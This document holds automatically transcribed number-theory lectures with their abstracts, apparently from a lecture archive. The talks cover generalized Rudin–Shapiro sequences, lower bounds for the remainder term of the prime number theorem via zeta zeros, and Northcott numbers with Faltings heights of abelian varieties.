And so this difference will run through all of the group elements and basically our conditions imposes that we run in the correct way. We hit every group element in the same way and we get the result that in a fiber we have u n plus t equals u n plus g equally often whenever we fixed a g in the group. So what we need is that the difference of the function hits this in the correct way. And I skip the proof which is maybe is then just to decompose your large interval with capital n into fibers. You count the number of fibers that you need to eat up in some sense all of the integers 0 up to capital n and then you get a lower bound. So you get the sum of digits that will appear naturally in some way and you get a lower bound and the error term is of the size log n. But in the mean if you add this over the group of course you get capital n. So which means this difference between the mean for our little g and the mean value over the cardinality of the group this distance cannot be too large. What we get is actually then in that case we exactly get the log n. Yes so this was our results and we can use some probabilistic techniques in order to show what we had before. So if you fix i and j and look at what is the limit. So how often you get i and j whenever u n is generalized through the Shapiro sequence. Yes we basically we then get the result that we wanted and there are some higher dimension analogs that I just give a few pictures. You can use this combinatorial setting I would say to generate higher um uh root in Shapiro sequences that live on a d-dimensional t-dimensional space. And so what this means is if you fix a little square and you fix a vector d and to let this square grow and to compare the square with the with the shifted square. If you look at the mean value of the differences that the different terms that are in the squares then you still recover this log n term. And depending on the setting depending on the difference matrix that is basically underlying the underlying concept you can have quite nice pictures. So this is root in Shapiro vertically root in Shapiro horizontally and you get the sum of the two root in Shapiro's modulo 2. You still get this log n behavior and yes so quite pseudo random random pictures in the end. So I would like to stop here and thank you very much for your attention.
|
We introduce a family of block-additive automatic sequences, that are obtained by allocating a weight to each couple of digits, and defining the nth term of the sequence as being the total weight of the integer n written in base k. Under an additional combinatorial difference condition on the weight function, these sequences can be interpreted as generalised Rudin–Shapiro sequences. We prove that these sequences have the same two-term correlations as sequences of symbols chosen uniformly and independently at random. The speed of convergence is independent of the prime factor decomposition of k.
|
10.5446/53715 (DOI)
|
So, thank you for the invitation, and I will then switch to full screen mode, which means I will not see myself, but this is not a big problem. The topic I am talking about is large values of the remainder term of the prime number theorem, and we will immediately see what I mean exactly by these large values. First, we have to remember the explicit formula for primes; then delta x is the remainder term of the prime number theorem, and we see that this depends on the zeros of the zeta function, which I will always denote by beta plus i gamma, and we can restrict our attention to zeros with height less than x. Then we see that the oscillation, let us say the oscillation caused alone by a zero rho, is x to the beta divided by the modulus of rho, which means that asymptotically it is x to the beta divided by gamma. Now Littlewood raised the problem (perhaps it is not clear why he raised it) to prove an explicit oscillation result for the remainder term, if we suppose the existence of a hypothetical zero with real part at least one half and, for simplicity, with positive imaginary part. The reason why he raised this problem was that earlier the best result was a consequence of the Phragmén-Lindelöf theorem, and it had two drawbacks. One was that the bound was just x to the beta minus epsilon, so smaller than the oscillation caused by the zero, and secondly, even this weaker bound was ineffective. That means that even if we knew the existence of a concrete zero, or a hypothetical zero, we could not say from what point on and of what size this oscillation is. And this problem is due to the possible interference of the set of zeros, which means that if I consider a sum of complex numbers, then I cannot be sure that the sum of these complex numbers can be estimated from below by any term of this sum. That is, if we have positive real numbers, then we can estimate the sum from below by any term of it, but if we have complex numbers, this is naturally not the case. Now in order to settle this, I do not know for which particular problem it was originally, but actually in order to settle the problem of interference of complex zeros, Turán developed his method, Turán's power sum method, and this was the most frequent tool used in these investigations as well. Just to remark that if we consider zeros on the critical line, and we know that there are a lot of zeros there, then we get an even larger oscillation than the one caused by any single zero itself; we can gain a factor of the triple iterated logarithm of x, which I will denote by log_3 x, and this oscillation occurs in both the plus and the minus direction, which actually disproved a conjecture going back to Riemann's work, namely that, at least in the second form of the remainder term which appears here, pi x minus li x, we would have pi x always less than li x; Littlewood proved, in the same year, 1914, that this difference oscillates in both directions. Interestingly, at the same time it was known numerically that at least up to 10 million, pi x is less than li x, and now we know that at least until 10 to the 20, pi x really is less than li x.
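Written out, the objects just introduced are, in the standard truncated form of the explicit formula:

\[
\Delta(x)\;=\;\psi(x)-x\;=\;-\sum_{\substack{\rho=\beta+i\gamma\\ |\gamma|\le x}}\frac{x^{\rho}}{\rho}\;+\;O\!\left(\log^{2}x\right),
\qquad
\psi(x)=\sum_{p^{m}\le x}\log p,
\]

and the oscillation caused alone by a zero $\rho_0=\beta_0+i\gamma_0$ is of size

\[
\frac{x^{\beta_0}}{|\rho_0|}\;\sim\;\frac{x^{\beta_0}}{\gamma_0}\qquad(x\to\infty).
\]

Littlewood's 1914 theorem referred to above is, in this notation, $\Delta(x)=\Omega_{\pm}\!\left(x^{1/2}\log\log\log x\right)$.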
But we will not concentrate on sign changes now, so we will concentrate just on the size of the absolute value of the remainder term and in this case, it is not so critical which form of the remainder term we consider. So we will work with this delta x, which contains as you see the prime powers as well and therefore it doesn't appear this negative effect, which makes pi x less than li x usually. Now if we define with dy the average of the modulus of delta x and with sy, so phi, the maximum values of the modulus of the remainder term for x less than y, then to run succeeded in 1950 to solve the problem and the lower bound is really bigger than x y to better not minus epsilon. So there is a concrete explicit function and it is also explicitly given independence of the row from which point this estimate is true. Now some eight years later or nine years later, now we will prove the same for the average of the remainder term. The method in both worlds, the most critical part is to run spores some methods I mentioned or edited complex numbers if we have complex numbers and there are some might be much smaller than the largest term for example. And the two round work the other method which up to some extent helped to face with this situation. So in some sense with a factor what we will see later he succeeded to neglect this inter possible interference of zeros. So the result of Turan which was used in both his proof and Knapov's proof was the so-called second mean theorem of Turan's power some method that if we consider power some of n complex numbers, we use a normalization that the largest of this number has modulus one. And then if we consider we cannot state naturally that for every new this value should be large, but what we can state and this is what his second main theorem states that if we consider at least n values and consecutive values of this exponent, then apart from a very significant factor which is much less than one, we will reach the bound one and we have still a factor depending on these coefficients bj. Now in the present problem we cannot we don't need any coefficients. So that means we have a special case of this Turan second mean theorem which can be written in this case so that the new power some of n complex numbers taken if you take the maximum value for n consecutive values. And then this is a function which depends exponentially on the number of variables and it depends somewhat less drastically on the beginning of this interval. Now one can easily see that if we consider for example nth root of unity, then we have n minus one consecutive values always which are exactly zero and then we have one which is large. So that means in some sense this result is optimal and we don't know whether the lower bound is optimal or not. I used not exactly the same result but a similar argument that means it was more generalization of Dirichlet's approximation theorem to show that if we consider oscillation then this oscillation is really apart from a factor one minus epsilon, the oscillation is x to the better not divided by rho not in modulus. So that means the oscillation caused by a zero occurs really from time to time and this seemed to settle so to say to be precise almost completely the oscillation problem of delta x. And here this function c2 of rho not and epsilon was effective as well. 
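In the notation of the talk, the two quantities and the special case of Turán's second main theorem have roughly the following shape; the exact constant in the power-sum bound differs between versions of the method, so the $C$ below is a placeholder:

\[
D(Y)=\frac1Y\int_{1}^{Y}\bigl|\Delta(x)\bigr|\,dx,
\qquad
S(Y)=\max_{1\le x\le Y}\bigl|\Delta(x)\bigr|,
\]

and, for complex numbers $z_1,\dots,z_n$ normalised so that $\max_j |z_j|=1$,

\[
\max_{m+1\le\nu\le m+n}\Bigl|\sum_{j=1}^{n}z_j^{\nu}\Bigr|\;\ge\;\Bigl(\frac{n}{C\,(m+n)}\Bigr)^{\!n}.
\]

Taking the $z_j$ to be the $n$-th roots of unity illustrates why some exponential dependence on $n$ is unavoidable: the power sums vanish for $n-1$ consecutive exponents and have modulus $n$ only at every $n$-th one.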
The proof used Turan's method in not Turan's power sums but it was similar to the way Turan and Kanapovsky handled their proof their results but the difference was that I used another approximation theorem and I used still the general framework of Turan's result. Now immediately there is a question that what is the optimal oscillation result because we know that we have two zeros to conjugate zeros of the zeta function always and therefore I thought also that one minus epsilon could be replaced by two minus epsilon and this would be really the case if rho not was isolated if we would not have nearby other zeros and then the question was up to some extent or almost completely really settled by Silad Reves in 83 he showed that we don't know what is the optimal constant for the zeta function naturally if the Riemann hypothesis is true then the optimal constant is infinity. We remember that we have then an oscillation of size log log x times the log log x times the term of any zero on the critical line and so then this question is interesting just when Riemann hypothesis is false and so therefore it is very hard to say even how to say mathematically precisely what we mean by the optimal constant. Now he proved that the optimal constant is pi over 2 which meant the pi over 2 the result which I stated was true this pi over 2 minus epsilon instead of one minus epsilon on one hand and on the other hand if we consider a larger by the class of functions which include the zeta function as well then at least for this larger class of functions there are some functions for which pi over 2 is really the optimal constant. We could formulate it also that there could appear such intricate configuration of zeros of the zeta function so that the oscillation would be really not exceed pi half minus epsilon times the expected and proved value x to the rho naught over rho naught. Now I proved also several results on these other methods both for the average and the maximum value thereby improving the earlier results of Turan and Knapovsky also Schrager Puchta showed such an improvement and what our goal is that naturally different forms of these CRMs had different conditions concerning the dependence of y from gamma naught that means from if rho naught is given and then from which point on can we assert that the average or the maximum value is large then a lower bound as a function of y and gamma naught that means how large is really the average or the maximum dependent on gamma naught. A certain problem is that whether this large values occur just somewhere between one and y we can state that the average or the maximum is large or we can say that they occur up to some extent near to y so that means near to y means unfortunately not near on the normal scale but near on the logarithmic scale so that means that the logger if for an interval of the form a y to y and this beginning of the interval a y should be at least on the logarithmic scale near to log y. Now again we can consider effective or ineffective estimate and another method of mine gave a result which produced a lower bound which depended on the derivative on the absolute value of the derivative at the place rho naught which for concrete zeros which we know is really completely okay but it would be already somewhat disturbing so it would make the CRM let's say a little bit ineffective if we speak about a hypothetical zero and this could cause problems in some applications. 
Now I mentioned already that the really difficult case is Bendy and the really interesting case is Bendy rho naught is not on the critical line that means the Riemann hypothesis is really false. Now I mentioned just some results in this direction I proved that actually we can always reach that not only we have values as large as y to the better not divided by y to the better not divided by rho naught or x to the better not divided by rho naught sometimes but also that the average is at least y to the better not multiplied by some constant depending on the imaginary part of the zero and this has a corollary that on the Riemann hypothesis the average of the remainder term in modulus is at least square root y or the average is square root x. Now Krama showed already exactly 100 years ago that on the other hand the average of the remainder term in absolute value is at most constant times square root y so we know exactly apart from a constant the order of magnitude of the average order of the remainder term supposing the Riemann hypothesis this is this estimate here and on the other hand this is still unclear the maximum value of the remainder term between these two bounds. Now this actually served as an introduction for the CRM for which I will also sketch the proof namely that if we have a concrete zero of the zeta function and we know that y is enough large depending on an explicit way from the imaginary part of the zeta I just mentioned that already I mentioned that but what emphasize that all these constants c will be explicit constants. In this case we can localize we can consider the average of the remainder term in modulus and localize in the average in the logarithm scale from a beginning point near to y until y and we get for it a lower estimate which is just with a factor log log y square smaller x minus log log y square smaller than the expected value and concerning the localization I lose again the same log log y square quantity. Now the strategy is that we consider weighted mean value that means as I mentioned already concentrated to interval a y y where log y is near to log y we already specified that actually this a y would be this quantity so log a y is less than log y this quantity log log y square. Now this weighted mean value can be transferred into a sum of residues containing the zeros of the zeta function and up to this point the strategy is same as by Turan, Knapovsky and in my earlier works. The novelty is that the weight is chosen so that only zeros very near from row not should get non negligible weights and in this way we can avoid both Turan's method and both the loss which is caused by using Turan's second mean theorem. This means this quantity what we have here this is actually a loss compared with the expected value and naturally due to this averaging process and due to this procedure of getting rid of other zeros near to row not we have also a loss in the procedure but this loss is just a function x minus log log y squared various in the works of Turan and Knapovsky for example they had a loss of log y divided by log log y and we have instead log log y squared so we have a much smaller loss than in the procedure of Turan and Knapovsky. 
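In formulas, the conditional bounds and the localized theorem being sketched have roughly the following shape; the constants are explicit in the talk but not reproduced here, and the exact normalisation of the localized average is my guess:

\[
c_1\sqrt{Y}\;\le\;\frac1Y\int_{1}^{Y}\bigl|\Delta(x)\bigr|\,dx\;\le\;c_2\sqrt{Y}
\qquad\text{on the Riemann Hypothesis (upper bound: Cramér),}
\]

while for a given zero $\rho_0=\beta_0+i\gamma_0$ and $Y$ large enough, explicitly in terms of $\gamma_0$,

\[
\frac{1}{Y}\int_{Y_0}^{Y}\bigl|\Delta(x)\bigr|\,dx\;\ge\;Y^{\beta_0}\,e^{-c\,(\log\log Y)^{2}},
\qquad
\log Y_0\;\ge\;\log Y-(\log\log Y)^{2},
\]

so both the loss against the expected size $Y^{\beta_0}$ and the localization on the logarithmic scale are governed by $(\log\log Y)^2$, to be compared with a loss of order $\log Y/\log\log Y$ in the exponent in the Turán and Knapowski approach.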
Now in the present method we will what I said we will get rid of zeros not very near to the critical given zero row not so that means we will consider the construct of weight function which is asymptotically the same for a small group by group I mean just the set so there is no group operation here so for a small set R of zeta zeros near to row not it is asymptotically the same naturally these zeros are very near to row not then at the distance basically this C naught we can say it's five so at the distance at most five for all the other zeros the weight function will be just zero and in this way those residues will not appear at all you know and due to other part of the weight function the weights there will be not zero but negligible the weights for the residues if we are more far than five from this point now the in fact the original CRM was formulated in such a way that the upper bound was by now we consider in on the logarithmic scale an interval symmetric to by and this will be our estimate and here what we should possibly keep in mind is that script L is log log y squared lambda is log y and L is log log y so capital L is log log y lambda is log y and script L is log log y squared and script L is which on in the exponential scale appears both in the loss and the both in the localization and this will be the exact form in which I will prove our result and the beginning is a procedure what was observed by Turan that if we have a zero and we have near to that zero near means just that the on the logger on the the height is not too far from it but the zero is little bit more on to the right then we take this other zero instead of our original zero and so with step by step but the number of steps is at least at the most just log log y or we can log y we can go further to another zero what we call an extreme right hand zero and this extreme right hand zero has the property that its real part is at least as large as the real part of the original zero so in this oscillation CRM which has gained by it the imaginary part is can be somewhat larger but this is not decisive and still we have a control about it the original imaginary part was at most square root of lambda and by this procedure it will be just lambda squared and lambda is just log y so that means it will be still near to log y log y squared as at most but on the other hand more on the right and this is an important point of view that for this zero we have already if we go a little bit far to the right with a quantity one over log y then we will have a large so if we go a little bit more to the right then already in the how to say vicinity but not vicinity but in a rather large height so that means three times log y higher or three times log y lower there is no zero as at all so that means in some direction and at least we solved the isolation of row not but we are very far from saying that the row is an isolated zero so this procedure is just how to say routine used always by Turan and Knobsky and also myself in these works and this is just a nearly trivial starting point for the procedure and if so that means our final zero is this gamma wave K beta wave K row K wave this is what we substitute the original row not by this zero but then comes the idea is that we take a very small epsilon and then we consider zeros which can be reached from one from the other by a chain of zeta zeros so that neighboring zeta zeros are at a distance at most epsilon from each other but this epsilon is not a small absolute constant but this epsilon is 
something which is very small so first we consider already zeros which could be reached from each other by a chain of zeros at most with a distance at most as you see one over log y and this is even in the denominator multiplied so that means this one over log log y to the third power so these zeros are very near to each other if in this group there would be just one zero then this wave could be right called an isolated zero already and then we could so to say go further with this procedure but what we know just is that it might be so that means definitely the starting set of zeros was contained at most log log y that means L zeros this is by the result of back line and this was later we can so to say nest into each other smaller and smaller groups of zeta zeros so that they would be very near to each other but any zero outside that small set would be much more far from these zeros than those zeros are from each other so that means this whole we repeat the same procedure and we take all these sets which of zeros which could be reached so equivalence classes of the zeros which could be reached from other by a chain with a smaller epsilon to smaller means by a factor log log y third smaller and if we always consider and continue our work from the smallest set then this whole procedure must finish quite soon so the number of step should be just log L that means much much smaller and in this way in this way we will get very soon just really not an isolated but a set of zeros what we will call our by our this the property that they are very near to each other any other zero is already much further from it much further means still it may be a small distance but much further with a power with a factor log log y to the second power and then we consider an arbitrary zero from this set our and we will have so that means basically the same extreme right hand property will be true for this zero maybe with a little bit changed parameters and after which we consider polynomial we construct such a polynomial which is so to say since the residues will occur at the races robin minus row prime if so that means in this way we will get such a polynomial that if we consider any other zero which is not in this small group but at most the distance five from it then we will have a property that will be interesting in our case so that means if we are not in this small set of of equivalent zeros then the polynomial is zero and we have so this is one thing for those zeros which are in this small group this polynomial at the place row minus row one is asymptotically the same exactly one one plus or the one over log log y and we know bound for the value of this polynomial at different places a roughly speaking e to the l or s absolute value to the l so on in an exponential scale we have this l which is log log y squared l squared ten times or forty times i don't know how a hundred times i don't know this is the value of l and this will be equal to 40 times l will be the actual loss in the procedure and so this l will have an important role but that means we have a control over the size of the polynomial and here comes really the weighted mean value of delta we consider this delta x divided by x to one plus row one times weight on the value y over x so that means this is also in some sense on the logarithmic scale and the weight function is defined together with this gs function and the gs function has three factors the first factor is relatively small if we are let's say at a distance at least five and at most log y 
from the zero then if we are at least a distance log y from the zero then this factor will be very small that means negligible and with this ps we have a control over its increase along the imaginary axis or along any vertical line and we have this property that the row minus row one will be just for those zeros for which the value is naturally very near to one then for those zeros will be zero and so I go back to this that the polynomial will be zero at this points which are very near no the polynomial will be zero for those zeros which are not very near to the distinguished row one in this gamma less than gamma one less than five and the polynomial will be at the places row minus row one nearly equal to each other so that means the residues will be nearly equal to each other in this small group for the small group of zeros. Now one can show relatively easily that this weight function which is defined by an integral what we can do that if a is large then we shift the line of integration onto the left if a is small we shift the line of integration on into the right and if a is so to say in between that means not too small not too large then we integrate on the line on the imaginary line itself and then due to this factor which is sigma square minus t square in absolute value this will be very small if we are far at least the distance log y from the zero p s takes care to eliminate the residues at the zeros which are near to row one but not very near to row one and this factor will take care for others but now considering just the weight it is still this property is not needed just the way how quickly the polynomial p might increase and what we get will be that we will get either a very small quantity lambda is just log y so this would be the same as y to minus a for example and this will be very small if a is large this will be very small if a is small and in between we have again the same e to the l which is up to some extent lost in the procedure and this is the way how we show this and so that means it is a technical question now if we know this weight function then we can already estimate the weight of mean value of our original u y which was defined earlier in this way so that means delta x divided by x to one plus row one multiplied by these weight functions and then this weight function has the property that it localizes the whole integral just for the range y times e to the minus l to y times e to the 2l apart from a loss of factor e to the l and so that means that we can really forget about the tails of this integration and we get a localized average of the delta and this is exactly this d y what we will in this way we can connect the localized average with the full average of u y now if we go further to v y then this v y can be which is a weight of mean value of the remainder term can be expressed by integral and this integral is can be proved easily by partial summation we get the logarithmic derivative of zeta there and this means that the original mean value as we see here if we change the integration in this way then we get an integration for the function h s plus row one so we get an integral here in this way and we see that the residues occur at the places then s plus row one is equal to row that means if s is equal to row minus row one and this g s is small if row one is more far than five already from the original point row one this p is equal to zero that means g is also equal to zero if row is not in R but I forgot to write here it's here if so it's a distance is at 
least at most five in this case this polynomial p takes care for eliminating the residues at those zeros which are not in R so these are the zeros which are at the distance at most five maybe quite near to row one but not very near in the sense that not in this small group are so in this place is the function is analytic and this means that we get actually type of we can call it a power sum but I'm not quite precise here because I should write here that row is not equal in R plus oh no no that's okay that for all the zeros which are not equal to not in this size very near to R and but fortunately let me see oh not in R yes so that means okay yeah please continue Janosch Christian should ask the question after your talk yes that's thank you thank you so that means in this way we have the residues for all the zeros of the zeta function which are not near not very near to the original one and in this way we will get so we can call it a power sum but the value of this to evaluate this power sum is very easy excuse me for a moment yeah yeah so UV is yeah so UV is contains zeros which are so this is not not correct at all not equal to R yeah this is not correct we have zeros which are very near to R plus we have zeros which are at least the distance from R so that means these are not equal to R not in R these are aranials maybe the question refer to this so we are some zeros which are so if we consider the zeros which are so to say at the distance at least log y then we get y to minus two as an upper bound here if we consider zeros which are at at least five from it then again due to another part of the g function we get again something relatively small not so small like here but relatively small now what appears still still what remains still is that for those zeros which are in R we get asymptotically one for for each zeros and so we can evaluate easily the power sum for R and as I mentioned the zeros which are not in R but at a distance at most five they don't appear at all and in this way we get for this power sum we get exactly the lower estimate and we get by this lower estimate we can prove the original CRM as well and thank you for your attention
|
In the lecture we prove a lower estimate for the average of the absolute value of the remainder term of the prime number theorem which depends in an explicit way on a given zero of the Riemann zeta function. The estimate is only interesting if this hypothetical zero lies off the critical line, which naturally implies the falsity of the Riemann Hypothesis. (If the Riemann Hypothesis is true, stronger results are obtainable by other methods.) The first explicit results in this direction were proved by Turán and Knapowski in the 1950s, answering a problem of Littlewood from the year 1937. They used the power sum method of Turán. Our present approach does not use Turán's method and gives sharper results.
|
10.5446/53717 (DOI)
|
Thank you, thanks a lot. Bonjour à tous. It's a pleasure to be in Marseille, well virtually, but still thank you very much also for the organizers to make this happen. So I will report on some joint work with Martin Wittmer about Bertini and Northcott, so that's the title. Before starting math, let me just mention that the first time we discussed this with Martin was actually in Graz. I visited Graz in 2016. He invited me to give a talk and to stay there for a few days and then so we met also with Robert T. T. there, so I was also pretty happy to now report on what has been done so far thanks to that first invitation. Okay, so Bertini and Northcott, I will divide the talk into three. So I will start with some generalities. I will talk a little bit about some height functions, define what is the Northcott number, what we call the Northcott number and explain what Bertini theorem we obtain. So I will explain a little bit of the general scope. I won't go too much into the proofs of course, but you're very welcome to ask either now or later. So then the second part will be an application of the first part to the case of a billion varieties. So the first part will be a rather general for projective varieties and then I will specialize to a billion varieties and then we're going to describe what I call the APJ machine. So it's some kind of strategic theorem that aims at reducing proof to the case of Jacobian, to the sub case of Jacobian varieties. So that's the second part and the third part we're going to learn from the machine. So we're going to describe some applications of this theorem. So we're going to do a bit of machine learning in a way if you want, even though of course it has not so much to do with machine learning, but still a little play on word doesn't harm, right? So okay, so that's the plan. Let me start. So I'm going to start with a pick a point in a projective space. It's a point that has coordinates over a number field. And so what we want is to measure the size of that point. So how to do that in general, what you do is you select evaluation, probably the Archimedean one, and then you do a little bit of analysis just to understand how big the point is. So you can also do that over the Piatik fields. And then in high theory what we do is we just collect everything with respect to all the absolute values, non-trivial, so Archimedean and non-Archimedean. So that's this MK that you can see here. It's just a set of unequivalent, non-trivial absolute values. So I'm just taking log max of all the coordinates and I have the height of x. Of course, a rather classical object in number theory. In particular, if I have a number, an algebraic number now, I can see that number as an element in P1 just by saying the first coordinate will be 1 and then this is my alpha. And then you just apply the formula I described here and you get the height of alpha. So we know how to measure the size of an algebraic number. An example that is classical that will help us also a little bit later is the roots of unity, as we've seen in the previous talk. So then the root of unity has height 0 and that's clear from the explicit formula because of course all the absolute values will be 1. So then log of 1 will be 0 and we just sum a bunch of zeros. So okay, so this height, this is the height of a point. I will also be interested in defining the height of a variety but I will do that a bit later. So now I can define the Northcott number. So what is the Northcott number? Let me pick a set of algebraic numbers. 
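For reference, the height described a moment ago is the absolute logarithmic Weil height; with one standard normalization (the talk does not dwell on which local normalization is used), it reads
\[
  h(x)\;=\;\sum_{v\in M_K}\frac{[K_v:\mathbf Q_v]}{[K:\mathbf Q]}\,
  \log\max\big(|x_0|_v,\dots,|x_m|_v\big),
  \qquad x=(x_0:\dots:x_m)\in\mathbf P^m(K),
\]
and for an algebraic number alpha one sets h(alpha) = h((1 : alpha)); in particular h(zeta) = 0 for every root of unity zeta, as recalled in the talk.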
It's an infinite set, it's more interesting what it is and I will need infinite sets of algebraic numbers a bit later to formulate the first theorem. So for any real number, I'm going to cut that set at height t. So that's this little s with little t here. So now I have a set of numbers in s. So these are all algebraic numbers. I can take the height, the veil height that I just defined previously and I want the height to be bounded by this level t. So the Northcott number of the set s is defined to be the infimum of all the non-negative t's such that this st is infinite. So what does it mean? It means that if I have an m of s that is finite, it's possible for me in the set s to find a lot of numbers with bounded height. So that's basically what it means, right? So a lot means infinity, really a lot. So this will be very important for us for the Bertini statement. I give you two examples to illustrate that definition. Let me pick a q-bar or we have all the algebraic numbers in s now. So then this m will be zero and how come? Well, because previously I recalled that the height of a root of unity is zero and we have infinitely many roots of unity in q-bar because we don't restrict the degree now. So of course, in that case, t can just be zero. In fact, the infimum is attained. So that's the first example. Second example, if we now we just respect to q, so if now s is the field of rational numbers, then the infimum is in fact plus infinity because we will never have infinitely many rational numbers of bounded height. That's the Northcott theorem. So this is why we call it the Northcott number. So that Northcott number is just basically saying, is there a way to select height somewhere such that below that height, I have infinitely many algebraic numbers and all these algebraic numbers will be used or at least the fact that I have a lot will be important in the in the Bertini theorem. So keep that in mind. This Northcott number, if it's finite, it will tell me that there's an option to get infinitely many algebraic numbers with bounded height. Good. So what do we know? We know how to take the height of a point and we know how to define this Northcott number. So I go a bit beyond that. So now I'm going to pick a projective variety of dimension g. So projective variety basically, let's consider is just a collection of polynomials, so the zero set of a polynomial of a system of polynomials in several variables. So that's my x and this is defined over a number field k. So what I'm going to do now is define a height for x. So if you know the theory of show forms, then so then you'll just follow that quickly. If you don't, so just imagine I'm picking a model that is rather nice. It's using plucker coordinates in the protective space I'm working with. But if you're not an expert there, don't worry, we just need a model that describes x in a rather nice way. So that's this fx. So fx is a polynomial in many variables that describes my variety x. So it's a model, projective model for my variety. And then I will define the height of x to be the height of that polynomial. So you could, there are several ways of doing this, you could take for instance, the maximum of the height of the coefficients defining that polynomial or the height of the vector or a view as a projective point. I mean, there's there's there's equivalent ways of doing this. So just basically the size of that polynomial of the coefficients describing my variety. So that's the height of a variety. Okay. 
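In symbols (writing N(S) for the Northcott number, a notation chosen only for this note), the definition and the two examples are:
\[
  S_t=\{\alpha\in S:\ h(\alpha)\le t\},\qquad
  \mathcal N(S)=\inf\{t\ge 0:\ S_t \text{ is infinite}\},
\]
\[
  \mathcal N(\overline{\mathbf Q})=0
  \ \ (\text{infinitely many roots of unity of height }0),\qquad
  \mathcal N(\mathbf Q)=+\infty
  \ \ (\text{Northcott's theorem}).
\]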
So a remark is that the the height of x will of course depend on the chosen projective model. Good. So in part two, I will specialize on on the case of a billion varieties. And that's the aim of the aim of the call areas as well in the end. So now I'm going to define another height that we will use only for a billion varieties. And I'm doing this because it's a little bit more intrinsic. So for this one, I will give you a little bit more details. But we will use it only in in the second part. Okay, so keep in mind now, if you have a projective variety, you have this height, a chow form height, with respect to a model, so some polynomials are describing the variety. And then we just take the height of these polynomials. And now if the variety happens to be an a billion variety, there will be a competing theory, another theory of heights, where we can also talk about the size of the variety. Okay, so I will, I will just give you the definition here, give a few comments, and then I can, I can give the theorem. So faulting site, what is that? So now I have a number field that I'm going to deal with an a billion variety, a of dimension G. Okay, is the ring of integers of that number field. And so it's there's a little bit more algebraic geometry here. So we will, we will study the variety as a generic fiber of what is called a scheme, a neural model over spec okay. So basically, it gathers the information about the variety itself. So that's the way it's called the generic fiber. And then you take a look at what is happening when you reduce modulo the the primes of the of okay. So you take a look at what's happening modulo various prime ideals at the same time. So you have a big object like a family if you want. So that's, that's my model. And then there's a section of that. So what are we going to define here? So we, we want to study the size to have a definition of the size of the a billion variety, but we want to avoid choosing a projective model, we want to avoid equations in a way. So how do we do that? The trick is to use you really go back to the very beginning of varieties in a way. What is the definition is really something that comes from differential forms. So what we do inside instead of taking the size of coordinates or the size of polynomials defining the variety, we take the size of a differential form. So how do you take the size of a differential form? So that's the space of my g differential forms here. Well, we, we basically integrate it. So for any line bundle of respect, okay, so for any such data, when you have a section, then you, you, you define what is called the Arachel of degree. So that's a complicated formula here. If you're not an expert, I, I, I understand that. But, but okay, so basically what you have to keep in mind is that there's a finite part, really something that comes from the primes where you reduce, when you reduce modulo p, and then there's a part that comes from the Archimede inside. And this is precisely where we will have this integrals coming in, coming in the game. So MK infinity, this is just a set of embeddings into the complex numbers. So that's, that's one definition. So you have the, the space of differentials on your variety. This is a second definition. If you have a line bundle, you can take what is called an Arachel of degree. And now I come to the definition of the fault in site. This is just a combination of the two. We take the Arachel of degree of the differentials, but we need metrics to, for the definition to make sense. 
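Here is a sketch of the definition just outlined, with notation one would usually use (the zero section is written epsilon here, and the normalizing constant c_g in the metric, which varies between references, is not specified in the talk):
\[
  h_F(A)\;=\;\frac{1}{[K:\mathbf Q]}\;\widehat{\deg}\Big(\varepsilon^{*}\Omega^{g}_{\mathcal A/\mathcal O_K}\Big),
  \qquad
  \|\omega\|_{\sigma}^{2}\;=\;c_g\,\Big|\int_{A_{\sigma}(\mathbf C)}\omega\wedge\overline{\omega}\Big|,
\]
where the scheme over Spec O_K is the Néron model of A, the bundle is the determinant of the relative g-differentials pulled back along the zero section, and the Arakelov degree collects a finite contribution from the primes of O_K and an archimedean contribution from the embeddings sigma of K into the complex numbers, measured with the metric above.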
So how do you measure the size at the Archimedean places? And this is how you do it: you just integrate your differential, so that you get a volume form, so that this integral is actually well defined. And it is going to give you a positive number, so it makes sense in the log that we took. So, okay, it's a complicated number, but this is a real number. And that real number will measure the size of the variety that we want to study, the abelian variety we want to study. So now a remark, maybe that's the thing you need to focus on: it does not depend on projective models. So it's a way to measure the size without having any model, in a way. That's a bit more intrinsic. So this is the reason why we spend a little bit of time on this, because there is a way to actually measure the size of a polynomial without the polynomial, if you want. So, okay, so that's the abelian case. Let me give you a little explanation that will also help you understand what's happening towards the end. I give you here the explicit formula of the Faltings height of an elliptic curve. So an elliptic curve has an easy model. And then if you want to check how this Faltings height behaves, then you can take a look at this formula. So basically it's the log of the discriminant. So it has information about bad primes. You collect all the bad primes, well, a little bit more, sometimes they come with some powers. And then you take the norm of that ideal, it's something positive, and then you get the log of that thing. So that's the bad part, I mean, the situation coming from the bad primes, from the finite places. And then the Archimedean places, it's also a log here of the delta. This is the discriminant form, delta of tau, the classical one; if I express it with the q-series, it's the q-product of (1 minus q to the n) to the power 24. And then this (Im tau) to the sixth is just some kind of symmetry factor, if you want, just to make sure that this will be invariant under the change of variables by the action of SL2(Z). So this tau is the period of the elliptic curve. And so if you take a look at the j-invariant expansion, so the j-invariant as a modular function has a q-expansion. So you take that q-expansion, it starts with one over q plus 744 plus 196884 q plus, etc., etc. You take that form and then you compute its size, the classical complex absolute value. So if you compute its size, it will be very linked (this strange symbol just means up to multiplicative factors, constant factors, which are essentially two pi or something like this); it's basically the size of Im tau. So if now you have a family of elliptic curves and this j-invariant is moving, the log of the j-invariant will move a little bit like Im tau, which means, if you take a look at this formula, basically the Faltings height is the max of the bad primes part, the log of the discriminant, and the height of the j-invariant. So this is something that we can make, of course, more precise, but basically what is really measured by the height is how bad the reductions can be and where you are in the moduli space of elliptic curves. So okay, for abelian varieties, we have this height that has a link with, it seems to have a link with, some bad primes and some j-invariant. Now the thing is that to link in general the height of an abelian variety with the bad primes is not that easy, in fact, and it will be the object of one of the corollaries.
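For reference, a commonly written form of the elliptic-curve formula just described (assuming a minimal or semistable model, and with the bounded terms coming from the powers of two pi absorbed into the error term, since the transcript does not fix a normalization) is:
\[
  12\,[K:\mathbf Q]\,h_F(E)\;=\;\log\big|N_{K/\mathbf Q}(\Delta_{E/K})\big|
  \;-\;\sum_{\sigma:K\hookrightarrow\mathbf C}\log\Big(|\Delta(\tau_\sigma)|\,(\operatorname{Im}\tau_\sigma)^{6}\Big)
  \;+\;O\big([K:\mathbf Q]\big),
\]
and since log|j(tau)| is roughly 2 pi Im tau when Im tau is large, this is what lies behind the heuristic just stated, that up to bounded error the Faltings height behaves like the max of the discriminant term and the height of the j-invariant.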
